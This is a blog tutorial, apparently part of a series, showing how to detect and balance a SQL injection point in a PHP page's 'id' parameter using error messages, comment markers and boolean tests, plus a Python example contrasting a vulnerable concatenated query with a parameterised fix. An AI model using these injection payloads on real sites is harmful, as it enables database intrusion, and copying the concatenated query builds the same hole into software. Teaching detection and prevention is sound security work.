Monday, June 4, 2012

SQL Injecting Parameters-2

From the last post, we know how to find the parameter, how to balance it, and how to get the injection field.

In the last post the developer had poorly coded the PHP script, so appending a single quote (') produced an error. He was thrown out of the company because hackers easily extracted information from the database.

Now a second developer has re-coded the PHP script, once again challenging the hacker community.

So we have a URL. Once again our prime objective is to understand how the second-layer code works, from the errors we get.

Let's start:

http://www.example.com/index.php?category=watch&id=1

So what can I conclude from the URL?
There must be a column (category) and rows (watch), and id=1 gives some information about the watch with id=1.

With that in mind, we know that 'id' may once again be a vulnerable parameter, so let's try to fuzz it.

http://www.example.com/index.php?category=watch&id=foo >> Unknown column 'foo' in 'where clause'

[+] Okay, it means that when we insert a string, it tries to match the string against the columns. This gives me the idea that, once again, no proper filtering is done.

http://www.example.com/index.php?category=watch&id=999999999 >> Blank Page

http://www.example.com/index.php?category=watch&id=CK123 >> Unknown column 'CK123' in 'where clause'

http://www.example.com/index.php?category=watch&id=123CK >> Unknown column '123CK' in 'where clause'

[+] It means that when we insert an alphanumeric string, it also tries to match it against the columns. No proper filtering is done.

http://www.example.com/index.php?category=watch&id=1' >> MySQL Error (Jackpot)

"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' LIMIT 0,1' at line 1"

[+] Inserting a special character breaks the developer's code.

Let's focus on the error we got:

#> Error 1: '' LIMIT 0,1'

OK, the error seems a little confusing, so let's try another special character:

http://www.example.com/index.php?category=watch&id=1\

"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\ LIMIT 0,1' at line 1"

#> Error 2: '\ LIMIT 0,1'

Now what we see here is that the developer has already put the outermost quotes around the value, and those are single quotes. Let's get rid of those.

The hacker opens up Notepad:

'' LIMIT 0,1'
' LIMIT 0,1

http://www.example.com/index.php?category=watch&id='  User Input here   '
http://www.example.com/index.php?category=watch&id='        1           '
http://www.example.com/index.php?category=watch&id='        1'          '

Let's try to balance it so that we get our injection field.

Notice something here: when we insert the single quote, the quotes become unbalanced and we get the error, but the id number is missing from it.

Now, to balance it we need the comment symbols.

What if we do something like this:

http://www.example.com/index.php?category=watch&id='        1 --+'          '

#> Our Injection is: --+'

Voila, it got balanced, and we have the injection field.

Now any valid SQL query placed between 1 (injection here) --+' will be executed.

Now, to check whether it is correct:

http://www.example.com/index.php?category=watch&id=1 AND 1=2 --+' >> Blank, as the logic is false
http://www.example.com/index.php?category=watch&id=1 AND 1=1 --+' >> Valid display, as the logic is true
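As an added example (not code from the original post or from the site it describes), here is a Python/SQLite stand-in for the second developer's script. It rebuilds the query the way the error messages reveal it (outer single quotes, then LIMIT 0,1), so you can see exactly why id=1' leaves the fragment ' LIMIT 0,1 dangling, and places the parameterised form next to it, which is the fix. The watch table, its rows and the function names are constructed assumptions; only the single-quote probe is modelled, since SQLite does not treat a backslash as an escape the way MySQL does.

```python
import sqlite3

def setup():
    # Constructed stand-in for the site's watch table (assumption, not the real schema).
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE watch (id TEXT, name TEXT)")
    conn.executemany("INSERT INTO watch VALUES (?, ?)",
                     [("1", "Chrono"), ("2", "Diver")])
    return conn

def build_vulnerable_query(user_id):
    # Reproduces the quoting the errors reveal: the script wraps the raw value
    # in single quotes and appends LIMIT 0,1, so the value becomes SQL text.
    # For "1'" this yields ... id='1'' LIMIT 0,1 and the tail ' LIMIT 0,1 is
    # exactly the fragment MySQL quoted back in the error.
    return "SELECT name FROM watch WHERE id='" + user_id + "' LIMIT 0,1"

def lookup_vulnerable(conn, user_id):
    # Returns ("ok", name-or-None) or ("error", message): the blank page /
    # database error pair seen in the post.
    try:
        row = conn.execute(build_vulnerable_query(user_id)).fetchone()
        return ("ok", row[0] if row else None)
    except sqlite3.OperationalError as exc:
        return ("error", str(exc))

def is_valid_id(user_id):
    # Defence in depth: id is numeric, so reject anything else before it
    # reaches the database at all.
    return user_id.isdigit()

def lookup_safe(conn, user_id):
    # Parameterised query: the driver sends the value separately from the
    # statement, so a quote, backslash or comment marker in it cannot change
    # the SQL that runs.
    if not is_valid_id(user_id):
        return ("rejected", None)
    row = conn.execute("SELECT name FROM watch WHERE id=? LIMIT 0,1",
                       (user_id,)).fetchone()
    return ("ok", row[0] if row else None)

if __name__ == "__main__":
    db = setup()
    for probe in ("1", "999999999", "1'"):
        print(repr(probe), lookup_vulnerable(db, probe), lookup_safe(db, probe))
```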

Again, in this post I am not showing the next steps, because identifying the injection is the crucial part of SQL injection.

Hope you are enjoying it.

Thank You!
